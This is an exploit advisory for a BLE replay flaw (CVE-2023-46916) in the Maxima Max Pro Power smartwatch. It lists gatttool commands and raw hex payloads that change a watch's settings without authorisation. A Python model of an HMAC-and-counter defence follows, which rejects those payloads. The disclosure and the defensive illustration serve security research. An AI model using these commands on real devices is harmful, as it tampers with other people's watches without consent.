Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

Published: 03 Mar 2024 00:00:00
Reported by: Alok kumar
Type: exploitdb
Source: www.exploit-db.com
Views: 318

Maxima Max Pro Power BLE Traffic Replay allows unauthorized actions through crafted HEX values written to the watch, which performs no data integrity checks on what it receives.

Related

Family        Reporter      Title                                                                      Published
0day.today    zdt           Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) Vulnerability  4 Mar 2024 00:00
ATTACKERKB    attackerkb    CVE-2023-46916                                                             7 Dec 2023 06:15
Circl         circl         CVE-2023-46916                                                             30 Dec 2023 11:06
CNNVD         cnnvd         Maxima Max Pro Power Security Vulnerability                                7 Dec 2023 00:00
CVE           cve           CVE-2023-46916                                                             7 Dec 2023 00:00
Cvelist       cvelist       CVE-2023-46916                                                             7 Dec 2023 00:00
EUVD          euvd          EUVD-2023-51080                                                            3 Oct 2025 20:07
NVD           nvd           CVE-2023-46916                                                             7 Dec 2023 06:15
Packet Storm  packetstorm   Maxima Max Pro Power 1.0 486A BLE Traffic Replay                           13 Nov 2023 00:00
Prion         prion         Design/Logic Flaw                                                          7 Dec 2023 06:15

# Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)
# Date: 13-Nov-2023
# Exploit Author: Alok kumar ([email protected]), Cyberpwn Technologies Pvt. Ltd.
# Vendor Homepage: https://www.maximawatches.com
# Product Link: https://www.maximawatches.com/products/max-pro-power
# Firmware Version: v1.0 486A
# Tested on: Maxima Max Pro Power
# CVE : CVE-2023-46916

# It was observed that an attacker can send crafted HEX values to the “0x0012” GATT Characteristic handle on the watch to perform unauthorized actions such as changing the time display format, updating the time, and updating notifications.
# Since there is no integrity check on data received by the watch, an attacker can sniff the same value on smartwatch A and later send it to smartwatch B, leading to unauthorized actions.


# Scan for Bluetooth LE devices nearby using any capable scanner; bluetoothctl is used here: “sudo bluetoothctl scan le”

# “sudo gatttool -I” starts gatttool in interactive mode.

# “connect <MAC_OF_DEVICE_FROM_STEP_1>” connects to the specified BLE device.

# “char-desc” lists all handles for the device.

# Run “mtu 247” in gatttool after connecting to set the MTU for the active connection.

# Run “char-read-hnd 0x0054” in gatttool. Trust and authorize the device on the attacker's machine when prompted.

# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.

# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.

# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor

# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.

# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.
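The root cause the advisory names is that the watch applies whatever is written to handle 0x0012 with no integrity or freshness check, which is why a value captured from smartwatch A works unchanged against smartwatch B and why any re-sent capture works again. The Python below is an added illustration of the countermeasure a firmware would need, not the advisory's code and not a description of the vendor's actual firmware: it models a hypothetical write format `counter(4) || payload || HMAC-SHA256 tag(16)` keyed per device, and shows that under that design the advisory's own raw values, a replay to the same watch, and a replay to a second watch are all rejected while the paired phone's writes still go through. The class names, key values, device ids and wire layout are all assumptions made for this example; only the two hex payloads are taken from the advisory.

```python
import hashlib
import hmac
import struct

# These two raw command values are quoted from the advisory above; they are the
# exact bytes the advisory says are written to handle 0x0012.
RAISE_TO_WAKE_OFF = bytes.fromhex("ab00000e5422002202002b0009000000059fffffffff")
TIME_FORMAT_24H = bytes.fromhex("ab000007c323001902001800020002")

TAG_LEN = 16      # truncated HMAC-SHA256 tag appended to every write (assumed)
COUNTER_LEN = 4   # big-endian write counter prepended to every write (assumed)


class AuthenticatedWatch:
    """Hypothetical firmware-side check (not the vendor's code): the watch only
    applies a command that carries a valid per-device MAC and a counter higher
    than the last one it accepted."""

    def __init__(self, device_id: bytes, key: bytes) -> None:
        self.device_id = device_id   # bound into the MAC, so a frame built for
        self.key = key               # one watch is meaningless to another
        self.last_counter = 0
        self.applied: list[bytes] = []

    def _tag(self, counter: int, payload: bytes) -> bytes:
        msg = self.device_id + struct.pack(">I", counter) + payload
        return hmac.new(self.key, msg, hashlib.sha256).digest()[:TAG_LEN]

    def handle_write(self, frame: bytes) -> str:
        # Assumed wire format: counter(4) || payload || tag(16)
        if len(frame) < COUNTER_LEN + 1 + TAG_LEN:
            return "rejected: too short"
        counter = struct.unpack(">I", frame[:COUNTER_LEN])[0]
        payload, tag = frame[COUNTER_LEN:-TAG_LEN], frame[-TAG_LEN:]
        # Integrity and origin: constant-time compare against the expected tag.
        if not hmac.compare_digest(tag, self._tag(counter, payload)):
            return "rejected: bad tag"
        # Freshness: a counter at or below the last accepted one is a replay.
        if counter <= self.last_counter:
            return "rejected: replay"
        self.last_counter = counter
        self.applied.append(payload)
        return "accepted"


class PairedPhone:
    """The legitimate companion side: shares the watch's key and keeps the
    counter moving forward so every write is fresh."""

    def __init__(self, device_id: bytes, key: bytes) -> None:
        self.device_id = device_id
        self.key = key
        self.counter = 0

    def build_frame(self, payload: bytes) -> bytes:
        self.counter += 1
        msg = self.device_id + struct.pack(">I", self.counter) + payload
        tag = hmac.new(self.key, msg, hashlib.sha256).digest()[:TAG_LEN]
        return struct.pack(">I", self.counter) + payload + tag


def demo() -> dict[str, str]:
    """Runs the advisory's scenarios against the authenticated design.
    Keys and device ids are constructed for this example."""
    key_a, key_b = b"K" * 32, b"Q" * 32
    watch_a = AuthenticatedWatch(b"WATCH-A", key_a)
    watch_b = AuthenticatedWatch(b"WATCH-B", key_b)
    phone_a = PairedPhone(b"WATCH-A", key_a)

    results = {}
    # 1. The raw value from the advisory, written with no tag at all.
    results["raw_write"] = watch_a.handle_write(RAISE_TO_WAKE_OFF)
    # 2. The same command sent by the paired phone.
    frame = phone_a.build_frame(RAISE_TO_WAKE_OFF)
    results["legit_write"] = watch_a.handle_write(frame)
    # 3. The captured legitimate frame sent again to the same watch.
    results["replay_same_watch"] = watch_a.handle_write(frame)
    # 4. The captured frame sent to a different watch (the A -> B case).
    results["replay_other_watch"] = watch_b.handle_write(frame)
    # 5. The phone keeps working because its counter advances.
    results["next_legit_write"] = watch_a.handle_write(phone_a.build_frame(TIME_FORMAT_24H))
    return results


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario:20s} {outcome}")
```

The counter covers replay against the same watch and the device id inside the MAC covers cross-device replay; the key is what ties a write to the pairing relationship, so a sniffer that sees the frame still cannot produce a valid one. In a real firmware the counter would have to survive reboots (or be replaced by a challenge nonce) and the key would come from the pairing/bonding step, neither of which this model attempts.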
